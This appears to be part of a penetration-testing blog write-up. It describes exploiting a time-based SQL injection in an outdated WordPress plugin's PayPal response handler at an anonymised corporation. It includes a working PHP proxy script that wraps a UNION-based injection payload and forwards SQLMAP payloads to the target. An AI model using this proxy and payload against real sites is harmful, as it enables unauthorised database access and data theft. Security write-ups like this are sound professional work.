In Part 1, I outlined how during this Operation, I discovered an outdated WordPress. I researched plugins and the theme that were installed on the WordPress script and obtained reflected XSS, partially Local File Include, and time-based SQL injection.
If this was a normal pentest, this would be the end. I would write up the findings and recommendations. However, this was a remote operation. I was assessing a large corporation I am calling Target Corporate.
SQL Injection Exploitation
In Part 1, I used a Local File Include that turned to be useful to include a page that is vulnerable to SQL injection, I also created a POC regarding the SQL injection, In this part, I will explain how the time-based SQL injection was exploited.
I used the SQLMAP tool but the vulnerability can not be directly exploitable by SQLMAP, thus, I had to create a PHP page that acts as a proxy between SQLMAP and the vulnerable page and created the injection point that will be used by SQLMAP to launch successful exploitation.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
<?php $url="https://*********************"; $injection=$_GET['inj']; post_it($url,$injection); function post_it($url,$injection){ $ch = curl_init(); $post="custom=2' or 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,".$injection."-- -|sssssss"; curl_setopt($ch, CURLOPT_URL, "$url/?payment_response=paypal_response"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); //return the transfer as a string curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); echo $output; curl_close($ch); } ?> |
The PHP page will be hosted on my localhost, it contains a user input called $inj that will be used to send the SQL injection payloads to the targeted vulnerable input in a good manner, I made it exploitable for SQLMAP to inject its time-based SQL injection payloads.